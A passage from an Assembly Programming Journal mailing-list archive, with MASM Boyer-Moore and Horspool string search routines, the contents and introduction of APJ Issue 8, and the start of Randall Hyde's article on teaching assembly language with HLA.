   ; ----------------------------------------------
     mov ecx, ebx                ; SubString length in ECX
     dec ecx                     ; correct for zero based index
     mov esi, lpSubStr           ; address of SubString in ESI
     lea edi, shift_table

     xor eax, eax

   Write_Shift_Chars:
     mov al, [esi]               ; get the character
     inc esi
     mov [edi+eax*4], ecx        ; write shift for each character
     dec ecx                     ; to ascii location in table
     jnz Write_Shift_Chars

   ; -----------------------------
   ; set up for main compare loop
   ; -----------------------------
     mov ecx, ebx
     dec ecx
     mov cval, ecx

     mov esi, lpSource
     mov edi, lpSubStr
     add esi, startpos           ; add starting position

     jmp Pre_Loop

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Calc_Suffix_Shift:
     add eax, ecx
     sub eax, cval               ; sub loop count
     jns Add_Suffix_Shift
     mov eax, 1                  ; minimum shift is 1

   Add_Suffix_Shift:
     add esi, eax                ; add SUFFIX shift
     mov ecx, cval               ; reset counter in compare loop

   Test_Length:
     cmp edx, esi                ; test exit condition
     jl No_Match

   Pre_Loop:
     xor eax, eax                ; zero EAX for following partial writes
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     je @F
     mov eax, shift_table[eax*4]
     cmp ebx, eax
     jne Add_Suffix_Shift        ; bypass SUFFIX calculations
     lea esi, [esi+ecx+1]        ; add BAD CHAR shift
     jmp Test_Length
   @@:
     dec ecx
     xor eax, eax                ; zero EAX for following partial writes

   Cmp_Loop:
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     jne Set_Shift               ; if not equal, get next shift
     dec ecx
     jns Cmp_Loop
     jmp Match                   ; fall through on match

   Set_Shift:
     mov eax, shift_table[eax*4]
     cmp ebx, eax
     jne Calc_Suffix_Shift       ; run SUFFIX calculations
     lea esi, [esi+ecx+1]        ; add BAD CHAR shift
     jmp Test_Length

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Match:
     sub esi, lpSource           ; sub source from ESI
     mov eax, esi                ; put length in eax
     jmp Cleanup

   No_Match:
     mov eax, -1

   Cleanup:
     pop edi
     pop esi
     pop ebx

     ret

BMBinSearch endp

; #########################################################################

     end

     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     @                                                               @
     @  The Horspool style variation using the BAD CHARACTER shift   @
     @                                                               @
     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


; #########################################################################

     .486
     .model flat, stdcall  ; 32 bit memory model
     option casemap :none  ; case sensitive

     .code

; #########################################################################

BMHBinsearch proc startpos:DWORD,
                   lpSource:DWORD,srcLngth:DWORD,
                   lpSubStr:DWORD,subLngth:DWORD

     LOCAL cval:DWORD
     LOCAL shift_table[256]:DWORD

     push ebx
     push esi
     push edi

     mov ebx, subLngth

     cmp ebx, 1
     jg @F
     mov eax, -2                 ; string too short, must be > 1
     jmp BMHout
   @@:

     mov esi, lpSource
     add esi, srcLngth
     sub esi, ebx
     mov edx, esi                ; set Exit Length

   ; ----------------------------------------
   ; load shift table with value in subLngth
   ; ----------------------------------------
     mov ecx, 256
     mov eax, ebx
     lea edi, shift_table
     rep stosd

   ; ----------------------------------------------
   ; load decending count values into shift table
   ; ----------------------------------------------
     mov ecx, ebx                ; SubString length in ECX
     dec ecx                     ; correct for zero based index
     mov esi, lpSubStr           ; address of SubString in ESI
     lea edi, shift_table

     xor eax, eax

   Write_Chars:
     mov al, [esi]               ; get the character
     inc esi
     mov [edi+eax*4], ecx        ; write shift for each character
     dec ecx                     ; to ascii location in table
     jnz Write_Chars

   ; -----------------------------
   ; set up for main compare loop
   ; -----------------------------
     mov ecx, ebx
     dec ecx
     mov cval, ecx

     mov esi, lpSource
     mov edi, lpSubStr
     add esi, startpos           ; add starting position

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Main_Loop:
     sub eax, eax                ; zero EAX before partial write
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     jne Get_Shift               ; if not equal, get next shift
     dec ecx
     jns Main_Loop

     jmp Matchx

   Get_Shift:
     inc esi                     ; inc esi for minimum shift
     cmp ebx, shift_table[eax*4] ; cmp subLngth to char shift
     jne Exit_Test
     add esi, ecx                ; add bad char shift
   Exit_Test:
     mov ecx, cval               ; reset counter in compare loop
     cmp esi, edx                ; test for exit condition
     jl Main_Loop

     jmp MisMatch

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Matchx:
     sub esi, lpSource           ; sub source from ESI
     mov eax, esi                ; put length in eax
     jmp BMHout

   MisMatch:
     mov eax, -1

   BMHout:
     pop edi
     pop esi
     pop ebx

     ret

BMHBinsearch endp

; #########################################################################

     end

         @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
         @                                                        @
         @   The simplified version using the GOOD SUFFIX shift   @
         @                                                        @
         @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

; #########################################################################

     .486
     .model flat, stdcall  ; 32 bit memory model
     option casemap :none  ; case sensitive

     .code

; #########################################################################

SBMBinSearch proc startpos:DWORD,
                   lpSource:DWORD,srcLngth:DWORD,
                   lpSubStr:DWORD,subLngth:DWORD

     LOCAL shift_table[256]:DWORD

     push ebx
     push esi
     push edi

     mov edx, subLngth

     cmp edx, 1
     jg @F
     mov eax, -2                 ; string too short, must be > 1
     jmp Cleanup
   @@:

     mov esi, lpSource
     add esi, srcLngth
     sub esi, edx
     mov ebx, esi                ; set Exit Length

   ; ----------------------------------------
   ; load shift table with value in subLngth
   ; ----------------------------------------
     mov ecx, 256
     mov eax, edx
     lea edi, shift_table
     rep stosd

   ; ----------------------------------------------
   ; load decending count values into shift table
   ; ----------------------------------------------
     mov ecx, edx                ; SubString length in ECX
     dec ecx                     ; correct for zero based index
     mov esi, lpSubStr           ; address of SubString in ESI
     lea edi, shift_table

     xor eax, eax

   Write_Shift_Chars:
     mov al, [esi]               ; get the character
     inc esi
     mov [edi+eax*4], ecx        ; write shift for each character
     dec ecx                     ; to ascii location in table
     jnz Write_Shift_Chars

   ; -----------------------------
   ; set up for main compare loop
   ; -----------------------------

     mov esi, lpSource
     mov edi, lpSubStr
     dec edx
     xor eax, eax                ; zero EAX
     add esi, startpos           ; add starting position

     jmp Cmp_Loop

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Calc_Suffix_Shift:
     add ecx, shift_table[eax*4] ; add shift value to loop counter
     sub ecx, edx                ; sub pattern length
     jns Pre_Compare
     mov ecx, 1                  ; minimum shift is 1

   Pre_Compare:
     add esi, ecx                ; add suffix shift
     mov ecx, edx                ; reset counter for compare loop

   Exit_Text:
     cmp ebx, esi                ; test exit condition
     jl No_Match

     xor eax, eax                ; clear EAX for following partial writes
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     je @F
     add esi, shift_table[eax*4]
     jmp Exit_Text
   @@:
     dec ecx

     xor eax, eax                ; clear EAX for following partial writes
   Cmp_Loop:
     mov al, [esi+ecx]
     cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
     jne Calc_Suffix_Shift       ; if not equal, get next shift
     dec ecx
     jns Cmp_Loop
     jmp Match                   ; match on fall through

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   Match:
     sub esi, lpSource           ; sub source from ESI
     mov eax, esi                ; put length in eax
     jmp Cleanup

   No_Match:
     mov eax, -1

   Cleanup:
     pop edi
     pop esi
     pop ebx

     ret

SBMBinSearch endp

; #########################################################################

     end

********************************** END *************************************


                                          Fastest Binary String Search
Algorithm
                                          by buliaNaza


; Fastest binary string search algo with
; PPlain and PMMX type of processors
; <c> 2001 by buliaNaza         ;
;                               ;
.data?                          ;
align 4                        ; !!!
skip_table   DD   256 Dup(?)   ; skip table
;                               ;
;...............................;
; Usage: esi ->pBuffer          ; esi->buffer with bytes to be searched
through
;        ebp = lenBuffer        ; ebp =length of the buffer
;        ebx ->pSrchData        ; ebx->pointer to data to be searched for
;        edx = lenSrchData      ; edx=length of data  to be searched for
;        edi ->pskip_table      ; edi->pointer to skip table (must be
aligned)
;        call BMCaseSNext       ;
;.................................;
.code                             ;
BMCaseSNext:                      ;
         cmp  edx, 4               ; edx = length of data to be searched for
         jg   Boyer_Moore          ;
;... Brute Force Search ..........; for 4 digits or less only!
         mov  edi, [ebx]           ; edi = dword of data to be searched for
         mov  ecx, 5               ;
         sub  ecx, edx             ;
         lea  eax, [esi+edx-1]     ; eax->new starting address in pBuffer
         shl  ecx, 3               ; *8
         mov  bl,  [ebx+edx-1]     ; get last byte only
         mov  bh,  bl              ; copy in bh
         bswap edi                 ;
         shr  edi, cl              ;
         add  ebp, esi             ; ebp ->end of buffer
         and  ebx, 0FFFFh          ; ebx = need the bx word only
         mov  ecx, ebx             ;
         mov  esi, edx             ; esi=edx = length of data to be searched
for
         shl  ecx, 16              ;
         test eax, 3               ;
         lea  ebx, [ebx+ecx]       ;
         jz   Search_2             ;
Unalign_1:                        ;
         cmp  eax, ebp             ; ebp ->end of buffer
         jge  Not_found            ;
         mov  cl, [eax]            ;
         inc  eax                  ;
         cmp  cl, bl               ;
         jz   Compare_1            ;
Search_1:                         ;
         test eax, 3               ;
         jnz  Unalign_1            ;
Search_2:                         ;
         cmp  eax, ebp             ;u ebp ->end of buffer
         jge  Not_found            ;v
         mov  ecx, [eax]           ;u scasb for the last byte from pSrchData
         add  eax, 4               ;v
         xor  ecx, ebx             ;u
         mov  edx, 7EFEFEFFh       ;v
         add  edx, ecx             ;u
         xor  ecx, -1              ;v
         xor  ecx, edx             ;u
         mov  edx, [eax-4]         ;v
         and  ecx, 81010100h       ;u
         jz   Search_2             ;v
                                   ;
         cmp  dl, bl               ;
         jz   Minus_4              ;
         cmp  dh, bl               ;
         jz   Minus_3              ;
         shr  edx, 16              ;
         cmp  dl, bl               ;
         jz   Minus_2              ;
         cmp  dh, bl               ;
         jz   Compare_1            ;
         jnz  Search_2             ;
Minus_2:                          ;
         dec  eax                  ;
         jnz  Compare_1            ;
Minus_4:                          ;
         sub  eax, 3               ;
         jnz  Compare_1            ;
Minus_3:                          ;
         sub  eax, 2               ;
Compare_1:                        ;
         mov  edx, edi             ;
         cmp  eax, ebp             ; ebp ->end of buffer
         jg   Not_found            ;
         cmp  esi, 1               ;
         jz   Found_1              ;
         cmp  dl, [eax-2]          ; eax->pBuffer
         jnz  Search_1             ;
         cmp  esi, 2               ;
         jz   Found_1              ;
         cmp  dh, [eax-3]          ; eax->pBuffer
         jnz  Search_1             ;
         cmp  esi, 3               ;
         jz   Found_1              ;
         shr  edx, 16              ;
         mov  cl, [eax-4]          ; eax->pBuffer
         cmp  dl, cl               ;
         jnz  Search_1             ;
Found_1:                          ;
         sub  eax, esi             ; in eax->pointer to 1st
         ret                       ; occurrence of data found in pBuffer
;...Boyer Moore Case Sens Next Search...;
Boyer_Moore:                      ;
         add  esi, ebp             ; esi->pointer to the last byte of pBuffer
         lea  ebx, [ebx+edx-1]     ; ebx->pointer to the last byte of
pSrchData
         neg  edx                  ; edx= -lenSrchData
         mov  ecx, edx             ; ecx = edx = -lenSrchData
         add  ebp, edx             ; sub lenSrchData from lenBuffer
         mov  eax, 256             ; eax = counter
         xor  ebp, -1              ; not ebp->current negative index
MaxSkipLens:                      ;
         mov  [eax*4+edi-4], edx   ; filling up the skip_table with
-lenSrchData
         mov  [eax*4+edi-8], edx   ;
         mov  [eax*4+edi-12], edx  ;
         mov  [eax*4+edi-16], edx  ;
         mov  [eax*4+edi-20], edx  ;
         mov  [eax*4+edi-24], edx  ;
         mov  [eax*4+edi-28], edx  ;
         mov  [eax*4+edi-32], edx  ;
         mov  [eax*4+edi-36], edx  ;
         mov  [eax*4+edi-40], edx  ;
         mov  [eax*4+edi-44], edx  ;
         mov  [eax*4+edi-48], edx  ;
         mov  [eax*4+edi-52], edx  ;
         mov  [eax*4+edi-56], edx  ;
         mov  [eax*4+edi-60], edx  ;
         mov  [eax*4+edi-64], edx  ;
         mov  [eax*4+edi-68], edx  ;
         mov  [eax*4+edi-72], edx  ;
         mov  [eax*4+edi-76], edx  ;
         mov  [eax*4+edi-80], edx  ;
         mov  [eax*4+edi-84], edx  ;
         mov  [eax*4+edi-88], edx  ;
         mov  [eax*4+edi-92], edx  ;
         mov  [eax*4+edi-96], edx  ;
         mov  [eax*4+edi-100], edx ;
         mov  [eax*4+edi-104], edx ;
         mov  [eax*4+edi-108], edx ;
         mov  [eax*4+edi-112], edx ;
         mov  [eax*4+edi-116], edx ;
         mov  [eax*4+edi-120], edx ;
         mov  [eax*4+edi-124], edx ;
         mov  [eax*4+edi-128], edx ;
         sub  eax, 32          ;
         jne  MaxSkipLens      ; loop while eax=0
SkipLens:                     ;
         mov  al, [ecx+ebx+1]  ;u filling up with the real negative offset of
         inc  ecx              ;v every byte from the pSrchData, starting
from
         mov  [eax*4+edi], ecx ;u the last to the first, at the offset in
         jne  SkipLens         ;v skip_table equal to the ASCII code of the
                               ;  byte, multiplied by 4
Search:                       ;  the main searching loop-> FAST PART
         mov  al, [esi+ebp]    ;u get a byte  from pBuffer ->esi +ebp
         mov  ecx, edx         ;v ecx=edx= -lenSrchData
         sub  ebp, [eax*4+edi] ;u sub negative offset for this byte from
                               ;  skip_table
         jc   Search           ;v if dword ptr [eax*4+edi] AND ebp <> 0 loop
                               ;  again
         lea  ebp, [ebp+esi+1] ;u current negative index -> next byte (+1)
         jge  Not_found        ;v end of pBuffer control (if ebp>=0 end)
                               ; compare previous bytes from pSrchData
(->ebx)
Compare:                      ; and current offset in pBuffer (->ebp)->SLOW
                               ; PART
         mov  eax, [ebx+ecx+1] ; one dword from pSrchData -> ebx
         inc  ecx              ; ecx = -lenSrchData
         jz   Found            ; if ecx = 0 Found&Exit
         cmp  al, [ebp+ecx-1]  ; ebp->pBuffer
         jnz  Not_equal        ;
         inc  ecx              ; ecx = -lenSrchData
         jz   Found            ; if ecx = 0 Found&Exit
         cmp  ah, [ebp+ecx-1]  ; ebp->pBuffer
         jnz  Not_equal        ;
         inc  ecx              ; ecx = -lenSrchData
         jz   Found            ; if ecx=0 Found&Exit
         shr  eax, 16          ;
         inc  ecx              ;
         cmp  al, [ebp+ecx-2]  ; ebp->pBuffer
         jnz  Not_equal        ;
         test ecx, ecx         ; ecx = -lenSrchData
         jz   Found            ; if ecx=0 Found&Exit
         cmp  ah, [ebp+ecx-1]  ; ebp->pBuffer
         jz   Compare          ;
Not_equal:                    ;
         sub  eax, eax         ; eax = 0
         sub  ebp, esi         ; restore ebp->current negative index
         jl   Search           ; end of pBuffer control
Not_found:                    ;
         or   eax, -1          ; Exit with flag Not_Found eax=-1
         ret                   ;
Found:                        ;
         lea  eax, [ebp+edx]   ; in eax->pointer to 1st
         ret                   ; occurrence  of data found in pBuffer



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#17 From: "Michael Mondragon" <mammon_@...>
Date: Sat Aug 26, 2000 9:23 am
Subject: APJ Issue #8 Mar 00-Aug 00
mammon_@...
Send Email Send Email
 
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                              Mar 00-Aug
00
:::\_____\::::::::::.                                             Issue
   8
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Teaching Assembly Language Using HLA"....................Randall.Hyde

"Processor Identification - Part II"..............Chris Dragan.&.Chili

"The LCC Intrinsics Utility"...............................Jacob.Navia

"Accessing COM Objects from Assembly"....................Ernest.Murphy

"64-bit Integer/ASCII Conversion"............................X-Calibre
Column: Win32 Assembly Programming
     "Win32 AppFatalExit Skeleton"................................Chili

Column: The Unix World
     "System Calls in FreeBSD".........................G.Adam.Stanislav
      "Loadable Kernel Modules"..................................mammon_

Column: Gaming Corner
     "Win32 ASM Game Programming"...........................Chris.Hobbs

Column: Assembly Language Snippets
     "SEH.INC"................................................X-Calibre
     "SEH.ASM"................................................X-Calibre


Column: Issue Solution
     "BCD_Conv"...........................................Angel.Tsankov

----------------------------------------------------------------------
        +++++++++++++++++++Issue Challenge++++++++++++++++++
               Convert a two-digit BCD to hexadecimal
----------------------------------------------------------------------


















::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by
mammon_


I cannot begin to count the number of subtle and overt hints I have received
that this issue is by far the most tardy APJ release to date. Quite a few
projects have conspired to steal my time away, from Linux essays to
disassembler coding to reverse engineering a hardware/software combo thrown
together by a madman bent on carrying the technology to his grave. Enough to
say, though, that the issue is finally ready for distribution. Not only
that,
but I actually have about four article left over --including Part II of the
ASM
Gaming series-- to include in APJ 9.

The articles in this issue encompass a wide range of topics, from
customizing
the LCC compiler to programming games in asm. Randall Hyde, who I'm sure
needs
no introduction to assembly coders, has provided an excellent article
discussing the teaching of assembly language, and how he developed HLA to
assist. Chili has done a fair amount of work as well, working on everything
from CPU identification and exception handling to preparing an online gaming
article for ASCII publication.

X-Calibre has provided two complete programming packages, one for exception
handling and one for converting 64-bit integers; an introductory COM article
which further demystifies COM has been provided by Ernest Murphy. The Unix
camp
is doubly represented this month, with an introduction to FreeBSD assembly
language [using NASM, of course] and my linux article deferred from the
previous issue. Capping everything off is a quick challenge and solution
provided by Angel Tsankov.

It has been suggested to me many times during the Time Of No Issues that I
should acquire a staff for ensuring that the issues get out on time. I am
open
to suggestions in this area; anyone willing to volunteer their time on a
regular basis is welcome to contact me. Ideally, the mag should have a staff
that solicits articles [hint IRC hint], tests the code in each article, and
edits the articles to enforce formatting [80 col, 3sp tab] and commenting
standards. To date I've been doing the last one only, and as is readily
apparent I put it off as long as possible.

Another note, regarding mirrors. Translation of the APJ issues is perfectly
acceptable and highly encouraged; all I request is an email giving the URL
so
I can link to it from the main page. I should point out that the individual
articles, once removed from the context of the APJ issue, are the property
of
their individual authors, so contact them before 'repackaging'. Regarding
formatting, I have also received a few requests to reformat APJ in HTML or
another markup language to make reading and browsing easier. This I will not
do, for it makes APJ less portable and causes problems copying code from the
magazine to a source file. I have been working on syntax highlighting/tag
files
for vi and nedit; I will post these and any user-contributed translation
files
[e.g. APJ_to_HTML] on the main APJ website.

All pleading and excuses aside, issue 8 is now put to bed, and issue 9 will
be
out faster than you can recite GNU's license agreement. Enjoy the mag...

_m









::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                            Teaching Assembly Language Using
HLA
                                            by Randall Hyde



I first began teaching assembly language programming at Cal Poly Pomona in
the
Winter Quarter of 1987.  I quickly discovered that good pedagogical material
was difficult to come by;  even the textbooks available for the course left
something to be desired.  As a result, my students were learning very little
assembly language in the ten weeks available to the course.  After about two
quarters, I decided to do something about the textbook problem, so I began
writing a text I entitled "How to Program the IBM PC Using 8088 Assembly
Language" (obviously, this was back in the days when schools still used PCs
made by IBM and the main CPU you could always count on was the 8088).  "How
to
Program..." became the epitome of a "work in progress."  Each quarter I
would
get feedback from the students, update the text, and give it to Kinko's (and
the UCR Printing and Reprographics Department) to run off copies for my
students the very next quarter.

The original "How to Program..." text provided a basic set of library
routines
to print strings, input characters and lines of text, and a few other basic
functions.  This allowed the students to quickly begin writing programs
without
having to learn about the INT instruction, DOS, or BIOS.  However, I
discovered
that students were spending a significant time each quarter writing their
own
numeric conversion routines, string manipulation routines, etc.  One student
commented on "how much easier it was to program in 'C' than assembly
language
since all those conversions and string operations were built into the
language."  I replied that the real savings were due more to the 'C'
standard
library than the language itself and that a comparable library for assembly
language programmers would make assembly language programming almost as easy
as
'C' programming.  At that moment a little light when on in my head and I sat
down and wrote the first few routines of what ultimately became the "UCR
Standard Library for 80x86 Assembly Language Programmers" (You can still get
a
copy of the UCR stdlib from webster at the URL given above).  As I finished
each group of routines in the standard library, I incorporated them into my
courses.  This reaped immediate benefits as students spent less time writing
numeric conversion routines and spent more time learning assembly language.
My
students were getting into far more advanced topics than was possible before
the advent of the UCR Stdlib.

In the early 1990's, the 8088 CPU finally died off and IBM was no longer the
major supplier of PCs.  Not only was it time to change the title of my text,
but I needed to update references to the 8088 (that were specific to that
chip)
and bring the text into the world of the 80386 and 80486 processors.  DOS
was
still King and 16-bit code was still what everyone was writing, but issues
of
optimization and the like were a little outdated in the text.  In addition
to
the changes reflecting the new Intel CPUs, I also incorporated the UCR
Standard
Library into the text since it dramatically improved the speed at which
students progressed beyond the basic assembly programming skills.  I
entitled
the new version of the text "The Art of Assembly Language Programming," an
obvious knock-off of Knuth's series ("The Art of Computer Programming").

In early 1996 it became obvious to me that DOS was finally dying and I
needed
to modify "The Art of Assembly Language Programming" (AoA) to use Windows as
the development platform.  I wasn't interested in having students write
Windows
GUI applications in assembly language (the time spent teaching
event-oriented
programming would interfere with the teaching of basic machine organization
and
assembly language programming), but it was clear that the days of writing
code
that arbitrarily pokes around in memory and accesses I/O addresses directly
(things that AoA taught) were nearly over.  So I decided to get started on a
new version of AoA that used Windows as the basic development environment
with
the emphasis on writing console applications.  The UCR Standard Library was
the
single most important pedagogical tool I'd discovered that dramatically
improved my students' progress.  As I began work on a new version of AoA for
Windows 3.1 my first task was to improve upon the UCR Standard Library to
make
it even easier to use, more flexible, more efficient, and more "high level."

After six months of part time work I eventually gave up on the UCR Stdlib
v2.0.
The idea was right, unfortunately the tools at my disposal (specifically,
MASM
6.11) weren't quite up to the task at hand.  I was writing some really
tricky
macros, obviously exploiting code inside MASM that Microsoft's engineers had
never run (i.e., I discovered lots of bugs).  I would code in some
workarounds
to the defects only to have the macro package break at the next minor patch
of
MASM (e.g., from MASM 6.11a to MASM 6.11b).  There was also a robustness
issue.
Although MASM's macro capabilities are quite powerful and it almost let me
do
everything I wanted, it was very easy to confuse the macro package and then
MASM would generate some totally weird (but absolutely correct) diagnostic
messages that correctly described what was going wrong in the macro but made
absolutely no sense whatsoever at all to a beginning assembly language
student
who use using the macro to print some data to the console device.  As it
became
clear that the UCR Stdlib v2.0 would never be robust enough for student use,
I
decide to take a different approach.

About this time, I was talking with my Department Chair about the assembly
language course.  We were identifying some of the problems that students had
learning assembly language.  One problem, of course, was the paradigm shift
-
learning to solve problems using machine language rather than a high level
language.  The second problem we identified is that students get to apply
very
little of what they've learned from other courses to the assembly language
class.  A third problem was the primitive tools available to assembly
language
programmers.  Energized by this discussion, I decided to see how I could
solve
these problems and improve the educational process.

Problem one, the paradigm shift, had to be handled carefully.  After all,
the
whole purpose of having students take an assembly language programming
course
in the first place is to acquaint them with the low-level operation of the
machine.  However, I felt it was certainly possible to redefine parts of
assembly language so that would be more familiar to students.  For example,
one
might test the carry flag after an addition to determine if an unsigned
overflow has occurred using code like the following:

     add eax, 5
     jnc  NoOverflow
       << code to execute if overflow occurs >>
NoOverflow:


Although this code is fairly straight-forward, you would be surprised how
many
students cannot visualize this code on their own.  On the other hand, if you
feed them some pseudo code like:

     add eax, 5
     if( the carry flag is set ) then
         << code to execute if overflow occurs >>
     endif

those same students won't have any problems understanding this code.  To
take
advantage of this difference in perspective, I decided to explore changing
the
definition of assembly language to allow the use of  the "if condition then
do
something"  paradigm rather than the "if a condition is false them skip over
something" paradigm.  Fundamentally, this does not change the material the
student has to learn;  it just presents it from a different point of view to
which they're already accustomed.  This certainly wasn't a gigantic leap
away
from assembly language as it existed in 1996.  After all, MASM and other
assemblers were already allowing statements like ".if" and ".endif" in the
code.  So I tried these statements out on a few of my students.  What I
discovered is that the students picked up the basic "high level" syntax very
rapidly.  Once they mastered the high level syntax, they were able to learn
the
low-level syntax (i.e., using conditional jumps) faster than ever before.
What
I discovered is something that Nicoderm CQ is pushing for their smoking
cessation program: "learning assembly language in graduated steps (from high
level to low level) is easier than going about it 'cold turkey.'"

The second problem, students not being able to leverage their programming
skills from other classes, is largely linked to the syntax of Intel x86
assembly language.  Many skills students pick up, such as programming style,
indentation, appropriate programming construct selection, etc., are useless
in
a typically assembly language class.  Even skills like commenting and
choosing
good variable names are slightly different in assembly language programs.
As a
result, students spend considerable (unproductive) time learning the new
"rules
of the game" when writing assembly language programs.  This directly equates
to
less progress over the ten week quarter.  Ideally, students should be able
to
applying knowledge like program style, commenting style, algorithm
organization, and control construct selection they learned in a C/C++ or
Pascal
course to their assembly language programs.  If they could, they'd be "up
and
writing" in assembly language much faster than before.

The third problem with teaching assembly language is the primitive state of
the
tools.  While MASM provides a wonderful set of high level language control
constructs, very little else about MASM supports this "brave new world" of
assembly language I want to teach.  For example, MASM's variable
declarations
leave a lot to be desired (the syntax is straight out of the 1960's).  As I
noted earlier, as powerful as MASM's macro facilities are, they weren't
sufficient to develop a robust library package for my students.  I briefly
looked at TASM, but it's "ideal" mode fared little better than MASM.
Likewise,
while development environments for high level languages have been improving
by
leaps and bounds (e.g., Delphi and C++ Builder), assembly language
programmers
are still using the same crude command line tools popularized in the early
1970's.  Codeview, which is practically useless under Windows, is the most
advanced tool Microsoft provides specifically for assembly language
programmers.

Faced with these problems, I decided the first order of business was to
create
a new x86 assembly language and write a compiler for it.  I decided to give
this language the somewhat-less-than-original name of "the High Level
Assembler," or HLA (IBM and Motorola both already have assemblers that use a
variant of this name).  It took three years, but the first version of HLA
was
ready for public consumption in September of 1999.

I began using HLA in my CS 61 course (machine organization and assembly
language programming) at UCR in the Fall Quarter, 1999.  With no pedagogical
material other than a roughly written reference guide to the language, I was
expecting a complete disaster.  It turns out that I was pleasantly
surprised.
Although the students did have major problems, the course went far more
smoothly than I anticipated and we managed to cover about the same material
I
normally covered when using MASM.

Although things were going far better than I expected, this is not to say
that
things were going great, or even as smoothly as I would have liked.  The
major
problem, of course, was the lack of a textbook.  The only material the
students
had to study from were their lecture notes.  Clearly something needed to be
done about this.  Of course, the whole reason for spending three years
writing
HLA was to allow me to write a new version of AoA.  So in November, 1999, I
began work on the new edition of the text.  By the start of the Winter
Quarter
in January, 2000, I had roughed together five chapters, about 50% of the
material was brand new, the other 50% was cut, pasted, and updated from the
older version of the text.  During the quarter I rushed out two more
chapters
bringing the total to seven.  The Winter Quarter went far more smoothly than
the Fall Quarter.  Student projects were much better and the progress of the
class outstripped any assembly language course I'd taught prior to that
point.
Clearly the class was benefiting from the use of HLA.

By the start of the Spring Quarter in April, 2000, I'd managed to make one
proofreading pass over the first six chapters and I'd written the first
draft
of the eighth chapter.  With a bit of luck, I will have the first draft of
the
text ready by the end of Summer, 2000.  At that time I intend to "shop" the
text around to a set of publishers so other schools can benefit from the
work.

Well, this has been a long-winded report of HLA's justification.  You're
probably wondering what HLA is and whether it is applicable to you
(especially
if you're a programmer rather than an educator).  Fair enough, the rest of
this
article will discuss the HLA system and how you would use it.

HLA is a technically a compiler, not an assembler.  HLA v1.x converts an HLA
source file into a MASM-compatible assembly language source file.  This MASM
file is then assembled and linked to produce a Win32 executable file.  The
HLA
compiler automatically runs the assembler and linker, so these steps are
transparent to the HLA user (other than the few extra seconds it takes to
assemble and link the output file).  This whole process takes only a few
seconds (for example, compiling, assembling, and linking the 750-line
"x2p.hla"
program in the HLA examples directory only takes about two seconds on a 266
MHz
Pentium II system with UW SCSI drives).  I am planning to emit object code
directly in version 2.0 of HLA.  Until then, an HLA user will need
Microsoft's
MASM and linker.  For those who would prefer to have HLA generate code for
TASM, NASM, or some other assembler, the HLA compiler source code is
available,
have fun :-).

HLA is a Win32 console application and it generates Win32 applications.  By
default, it generates console applications although it does not restrict you
to
writing console applications under Windows.  There is absolutely no support
for
DOS applications.  While it is possible to write Linux applications with
only
minor changes to HLA, the development process for Linux applications is
convoluted and hardly worthwhile.  HLA v2.0 will address portability across
32-bit x86 operating systems.  For now, using HLA is practical only under
Win32
OSes (Win 95, 98, NT, and 2000).

When designing the HLA language, I chose a syntax that is very similar to
common imperative high level languages like Pascal/Delphi, Ada, Modula-2,
FORTRAN77, C/C++, and Java.  That is not to say that HLA compiles Pascal
programs, but rather, a Pascal programmer will note many similarities
between
Pascal and HLA (and ditto for the other languages).  HLA stole many of the
ideas for data declarations from the Algol based languages (Pascal,
Modula-2,
and Ada), it grabbed the ideas for many of its control structures from
FORTRAN77, Ada, and C/C++/Java, and the structure of the HLA Standard
Library
is based on the C Standard Library.  So regardless of which high level
language
you're most comfortable with in this set, you'll certainly recognize some
elements of your favorite HLL in HLA.

A carefully written HLA program will look almost exactly like a high level
language program.  Consider the following sample program:

program SampleHLApgm;
#include( "stdlib.hhf" )

const
     HelloWorld := "Hello World";

begin SampleHLApgm;

     stdout.put( "The classical 'Hello World' program: ", HelloWorld, nl );

end SampleHLApgm;


This program does the obvious thing.  Anyone with any high level language
background can probably figure out everything except the purpose of "nl"
(which
is the newline string imported by the standard library).  This certainly
doesn't look like an assembly language program;  there isn't even a real
